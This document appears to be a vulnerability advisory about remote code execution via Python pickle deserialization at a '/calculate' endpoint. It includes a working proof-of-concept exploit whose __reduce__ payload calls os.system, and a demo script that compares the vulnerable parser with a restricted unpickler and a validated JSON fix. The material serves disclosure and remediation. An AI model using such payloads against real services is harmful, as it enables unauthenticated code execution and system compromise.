### Key Information

#### Vulnerability Overview

- **Vulnerability Type**: Remote Code Execution (RCE)
- **Affected Endpoint**: `/calculate`
- **Cause**: Unsafe deserialization of user-provided data using Python's `pickle.loads`.

#### Details

- **Request Type**: Accepts POST requests containing `body_parts` and `point_cloud` fields.
- **Encoding**: Both fields are base64-encoded pickle objects.
- **Issue**: The handler passes the decoded bytes straight to `pickle.loads`. `pickle` is not a data format but a small stack language: a pickle stream can instruct the unpickler to import any module, look up any callable and call it with attacker-chosen arguments (this is what `__reduce__` serializes to). Deserializing untrusted input with it is therefore arbitrary code execution by design, not a bug that input checks after the call can catch; the payload has already run by the time `pickle.loads` returns.
- **Attack Method**: An attacker crafts a pickle whose `__reduce__` resolves to `os.system` (or any other importable callable) and submits it base64-encoded in either field. No authentication or prior knowledge of the application's classes is needed.

#### Proof of Concept (PoC)

1. Start the server:

   ```bash
   python app.py
   ```

2. Run `poc.py`. The command executes in the server process, so look for `PWNED` on the server's console rather than in the HTTP response (the response may well be an error, since the handler receives `os.system`'s return value instead of the object it expects):

   ```python
   import base64
   import pickle

   import requests


   class Payload(object):
       # pickle serializes __reduce__'s return value as "call os.system('echo \"PWNED\"')";
       # the unpickler on the server performs that call while deserializing.
       def __reduce__(self):
           import os
           return (os.system, ('echo "PWNED"',))


   def poc():
       payload = pickle.dumps(Payload())
       resp = requests.post(
           "http://127.0.0.1:5000/calculate",
           headers={"Content-Type": "application/x-www-form-urlencoded"},
           data={
               # Malicious pickle goes in body_parts; point_cloud only needs to be
               # a syntactically valid pickle so the handler reaches the vulnerable call.
               "body_parts": base64.b64encode(payload).decode(),
               "point_cloud": base64.b64encode(pickle.dumps(None)).decode(),
           },
       )
       print(resp.status_code, resp.text)


   if __name__ == "__main__":
       poc()
   ```

#### Impact

- Successful exploitation allows an unauthenticated attacker to execute arbitrary code with the privileges of the server process, potentially leading to full system compromise, data theft, or service disruption.

#### Recommendations

- Never call `pickle.loads` (or `pickle.load`, `shelve`, `marshal`) on data that crosses a trust boundary. Base64 encoding is not authentication: anyone who can reach `/calculate` controls the bytes.
- Replace pickle with a data-only serialization format such as JSON, and validate the decoded structure (expected keys, types, list lengths, finite numeric ranges, a size cap) before using it.
- Input validation alone cannot make `pickle.loads` safe, because the payload executes during deserialization, before any check on the result can run. If pickle cannot be removed immediately, the Python documentation's interim measure is a `pickle.Unpickler` subclass whose `find_class` only permits an explicit allowlist of safe classes; this is a stop-gap, not a fix.

#### References

- [Python pickle Documentation (Security Considerations)](https://docs.python.org/3/library/pickle.html#security-considerations)
- [OWASP: Deserialization of Untrusted Data](https://owasp.org/www-community/vulnerabilities/Deserialization_of_untrusted_data)
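The following is an added example, not code from the vulnerable application or from the original report. It puts the three server-side options next to each other: the vulnerable `pickle.loads` pattern that `/calculate` uses, the restricted-unpickler stop-gap described in the pickle documentation, and the recommended JSON replacement with structural validation. The payload mirrors the PoC but calls `exec` to set an environment variable instead of `os.system`, so the effect is observable without a shell. The assumed JSON shape for `body_parts` (`{"name": [x, y, z], ...}`), the size cap and all function names are assumptions for illustration; the page does not specify the real schema.

```python
"""Vulnerable, stop-gap and fixed handling of a base64-encoded request field."""
import base64
import io
import json
import math
import os
import pickle


# --- attacker side ----------------------------------------------------------
class Payload:
    """Same technique as the PoC; `exec` stands in for `os.system` so the
    proof of execution (an environment variable) is visible in-process."""

    def __reduce__(self):
        return (exec, ("import os; os.environ['PICKLE_RCE_DEMO'] = 'executed'",))


def craft_field() -> str:
    """Base64-encoded pickle, the encoding the /calculate handler expects."""
    return base64.b64encode(pickle.dumps(Payload())).decode()


# --- server side: vulnerable (what /calculate does) -------------------------
def parse_field_unsafe(field: str):
    """The payload's callable runs inside loads(); nothing after it can help."""
    return pickle.loads(base64.b64decode(field))


# --- server side: stop-gap if pickle cannot be dropped yet -----------------
class RestrictedUnpickler(pickle.Unpickler):
    """Refuses every global lookup; a real deployment would allowlist the few
    classes it genuinely needs instead of rejecting all of them."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def parse_field_restricted(field: str):
    return RestrictedUnpickler(io.BytesIO(base64.b64decode(field))).load()


# --- server side: recommended fix (JSON + validation) ----------------------
def encode_json_field(obj) -> str:
    """Client-side counterpart: how a fixed client would encode the field."""
    return base64.b64encode(json.dumps(obj).encode()).decode()


def parse_field_json(field: str, max_bytes: int = 1 << 20) -> dict:
    """Assumed schema: object mapping part name -> [x, y, z] finite numbers."""
    try:
        raw = base64.b64decode(field, validate=True)
        if len(raw) > max_bytes:
            raise ValueError("field too large")
        data = json.loads(raw.decode("utf-8"))
    except ValueError as exc:  # binascii.Error, UnicodeDecodeError, JSONDecodeError
        raise ValueError(f"malformed field: {exc}") from None
    if not isinstance(data, dict):
        raise ValueError("expected a JSON object")
    for name, coords in data.items():
        ok = (isinstance(coords, list) and len(coords) == 3
              and all(isinstance(c, (int, float)) and not isinstance(c, bool)
                      and math.isfinite(c) for c in coords))
        if not ok:
            raise ValueError(f"bad coordinates for {name!r}")
    return data


def demo() -> dict:
    """Feed the malicious field to all three parsers and report what happened."""
    field = craft_field()
    os.environ.pop("PICKLE_RCE_DEMO", None)

    parse_field_unsafe(field)  # payload executes here
    unsafe_executed = os.environ.get("PICKLE_RCE_DEMO") == "executed"
    os.environ.pop("PICKLE_RCE_DEMO", None)

    try:
        parse_field_restricted(field)
        restricted_blocked = False
    except pickle.UnpicklingError:
        restricted_blocked = os.environ.get("PICKLE_RCE_DEMO") is None

    try:
        parse_field_json(field)  # pickle bytes are not valid UTF-8 JSON
        json_rejected = False
    except ValueError:
        json_rejected = True

    json_parsed = parse_field_json(encode_json_field({"head": [0.1, 1.7, 0.0]}))
    return {"unsafe_executed": unsafe_executed, "restricted_blocked": restricted_blocked,
            "json_rejected": json_rejected, "json_parsed": json_parsed}


if __name__ == "__main__":
    print(demo())
```

Running the file shows `unsafe_executed` true and the other two parsers refusing the same bytes. The JSON path also rejects inputs that are valid JSON but wrong for the schema (booleans, `NaN`, a three-element list replaced by a string), which is the validation step the original handler never had a chance to perform.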